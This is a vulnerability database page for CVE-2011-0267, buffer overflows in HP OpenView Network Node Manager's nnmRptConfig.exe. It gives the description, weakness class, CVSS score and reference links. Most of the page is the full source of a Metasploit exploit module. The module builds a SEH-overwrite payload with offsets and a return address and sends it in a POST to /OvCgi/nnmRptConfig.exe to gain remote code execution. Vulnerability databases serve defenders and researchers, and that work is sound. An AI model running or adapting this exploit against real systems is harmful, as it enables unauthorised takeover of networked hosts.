CVE-2011-0267 : Detail

CVE-2011-0267

Overflow
96.93%V3
Network
2011-01-13
17h35 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple buffer overflows in nnmRptConfig.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allow remote attackers to execute arbitrary code via a long (1) schdParams or (2) nameParams parameter, a different vulnerability than CVE-2011-0266.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17038

Publication date : 2011-03-23 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: hp_nnm_nnmrptconfig_schdparams.rb 12121 2011-03-24 00:49:33Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Seh def initialize(info={}) super(update_info(info, 'Name' => "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow", 'Description' => %q{ This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 12121 $", 'Author' => ['sinn3r'], 'References' => [ ['CVE', '2011-0267'], ['OSVDB', '70473'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-009/'], ], 'Payload' => { 'BadChars' => "\x00\x26\x2b", }, 'DefaultOptions' => { 'ExitFunction' => "seh", 'AutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'NNM 7.53 - Windows Server 2003 Ent', { 'Ret' => 0x5A30532D, #POP/POP/RET OvWww.dll 'Offset' => 46919, #Offset to SEH chain 'Pops' => 13, #Number of POPADs needed to find a bigger space with our payload 'Payloadoffset' => 57, #Offset to the payload }], ], 'DisclosureDate' => "Jan 10 2011")) register_options( [Opt::RPORT(80)], self.class ) end def exploit nops = make_nops(1000)*70 sploit = nops[0, target['Offset']] sploit << generate_seh_record(target.ret) sploit << "\x61"*target['Pops'] sploit << "\xff\xe1" #JMP ECX sploit << nops[0, target['Payloadoffset']] sploit << payload.encoded sploit << "\x44"*(70000-sploit.length) data = "Content&Action=Create&" data << "Template=Avail/CRAvail&" data << "Operation=Apply&" data << "Params=schdParams+nameParams&" data << "schdParams=#{sploit}%7Cmonthtodate&" data << "nameParams=text1%3DAAAA%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1" connect send_request_raw({ 'uri' => '/OvCgi/nnmRptConfig.exe', 'data' => data, 'version' => '1.1', 'method' => 'POST', 'headers' => { 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language' => 'en-us,en;q=0.5', 'Accept-Encoding' => 'gzip,deflate', 'Accept-Chrarset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'mag-age=0', 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) handler disconnect end end

Products Mentioned

Configuraton 0

Hp>>Openview_network_node_manager >> Version 7.51

Hp>>Openview_network_node_manager >> Version 7.53

References

http://www.securityfocus.com/archive/1/515628
Tags : vendor-advisory, x_refsource_HP
http://www.vupen.com/english/advisories/2011/0085
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/archive/1/515628
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/bid/45762
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/17038
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id?1024951
Tags : vdb-entry, x_refsource_SECTRACK
http://securityreason.com/securityalert/8156
Tags : third-party-advisory, x_refsource_SREASON